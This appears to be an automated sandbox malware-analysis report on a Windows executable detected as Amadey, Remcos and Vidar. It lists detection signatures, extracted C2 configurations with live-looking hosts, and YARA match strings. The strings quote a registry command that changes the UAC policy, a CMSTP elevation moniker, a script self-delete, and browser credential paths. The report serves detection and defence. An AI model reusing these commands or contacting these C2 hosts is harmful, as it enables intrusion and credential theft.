Edit tour

Windows Analysis Report
yaALNupJCH.exe

Overview

General Information

Sample Name:	yaALNupJCH.exe
Original Sample Name:	b2ee13e6988e57f6731c20da3459c8dc.exe
Analysis ID:	1315647
MD5:	b2ee13e6988e57f6731c20da3459c8dc
SHA1:	3be7be70961a381c48d35ba7d37add07a3e477a3
SHA256:	6cb42cc70376a4ba12627c2f6755d4235beffe85a6600dc91ffd7c22cb61df96
Tags:	Amadeyexe
Infos:

Detection

Amadey, Remcos, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Amadeys stealer DLL

Yara detected Amadey bot

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Yara detected UAC Bypass using CMSTP

Contains functionality to bypass UAC (CMSTPLUA)

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Antivirus / Scanner detection for submitted sample

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Contains functionality to steal Firefox passwords or cookies

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Contains functionalty to change the wallpaper

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Delayed program exit found

Contains functionality to modify clipboard data

Contains functionality to steal Chrome passwords or cookies

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to read the clipboard data

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Contains functionality to launch a program with higher privileges

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to simulate mouse events

Classification

Process Tree

System is w10x64

yaALNupJCH.exe (PID: 7428 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)

rundll32.exe (PID: 7504 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void) MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

yaALNupJCH.exe (PID: 7536 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)

yaALNupJCH.exe (PID: 7592 cmdline: C:\Users\user\Desktop\yaALNupJCH.exe MD5: B2EE13E6988E57F6731C20DA3459C8DC)

WerFault.exe (PID: 7720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199555780195", "https://t.me/solonichat"], "Botnet": "40eaa63b296d256c2181f079611d421f", "Version": "5.8"}

Threatname: Amadey

{"C2 url": "mardukoff.info/g9ecOb3jd/index.php", "Version": "3.89"}

Threatname: Remcos

{"Host:Port:Password": "81.19.131.36:2450:0", "Assigned name": "dfg", "Copy file": "remcos.exe", "Mutex": "dh-A9HL6N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
yaALNupJCH.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
yaALNupJCH.exe	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xce54f:$a1: Remcos restarted by watchdog! 0xceb9f:$a3: %02i:%02i:%02i:%03i

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aac8:$a1: Remcos restarted by watchdog! 0x6b040:$a3: %02i:%02i:%02i:%03i
00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x646f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aac8:$a1: Remcos restarted by watchdog! 0x6b040:$a3: %02i:%02i:%02i:%03i
00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Process Memory Space: yaALNupJCH.exe PID: 7428	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7428	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7428	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7428	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7428	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x86df:$a1: Remcos restarted by watchdog! 0x67502:$a1: Remcos restarted by watchdog! 0x8c39:$a3: %02i:%02i:%02i:%03i 0x9068:$a3: %02i:%02i:%02i:%03i 0x67a5c:$a3: %02i:%02i:%02i:%03i 0x67e8b:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yaALNupJCH.exe PID: 7536	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7536	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7536	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1de59:$a1: Remcos restarted by watchdog! 0x1e3b3:$a3: %02i:%02i:%02i:%03i 0x1e7e2:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yaALNupJCH.exe PID: 7592	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: yaALNupJCH.exe PID: 7592	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x8897:$a1: BinanceChainWallet 0x7cd87:$a2: wallet.dat 0x15e1a8:$a2: wallet.dat 0xf7d34:$a3: SOFTWARE\monero-project\monero-core 0x55199:$b1: CC\%s_%s.txt 0x551df:$b1: CC\%s_%s.txt 0x5472f:$b2: History\%s_%s.txt 0x54be4:$b2: History\%s_%s.txt 0x5471b:$b3: Autofill\%s_%s.txt 0x54bd1:$b3: Autofill\%s_%s.txt
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.yaALNupJCH.exe.cb0000.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.0.yaALNupJCH.exe.cb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.yaALNupJCH.exe.cb0000.1.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
3.0.yaALNupJCH.exe.cb0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0.2.yaALNupJCH.exe.cb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.yaALNupJCH.exe.cb0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
3.2.yaALNupJCH.exe.cb0000.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.yaALNupJCH.exe.cb0000.1.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
0.0.yaALNupJCH.exe.cb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.0.yaALNupJCH.exe.cb0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
2.0.yaALNupJCH.exe.cb0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.0.yaALNupJCH.exe.cb0000.0.unpack	Windows_Trojan_Amadey_7abb059b	unknown	unknown	0x686f:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
3.2.yaALNupJCH.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.yaALNupJCH.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.yaALNupJCH.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.yaALNupJCH.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.yaALNupJCH.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
2.2.yaALNupJCH.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
2.2.yaALNupJCH.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
2.2.yaALNupJCH.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
2.2.yaALNupJCH.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.yaALNupJCH.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
2.2.yaALNupJCH.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
2.2.yaALNupJCH.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 19 entries

Snort Signatures

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 95.141.41.12

Timestamp:	192.168.2.395.141.41.1249794802027700 09/28/23-06:01:52.097963
SID:	2027700
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 28 Sep 2023 04:01:54 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Tue, 26 Sep 2023 23:39:09 GMTAccept-Ranges: bytesContent-Length: 494080Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 64 9b bb 2d 20 fa d5 7e 20 fa d5 7e 20 fa d5 7e 94 66 24 7e 33 fa d5 7e 94 66 26 7e 87 fa d5 7e 94 66 27 7e 3e fa d5 7e 29 82 51 7e 21 fa d5 7e be 5a 12 7e 22 fa d5 7e 8d a4 d6 7f 3a fa d5 7e 8d a4 d0 7f 1a fa d5 7e 8d a4 d1 7f 02 fa d5 7e 29 82 46 7e 39 fa d5 7e 20 fa d4 7e 1d fb d5 7e 95 a4 dc 7f 44 fa d5 7e 95 a4 2a 7e 21 fa d5 7e 95 a4 d7 7f 21 fa 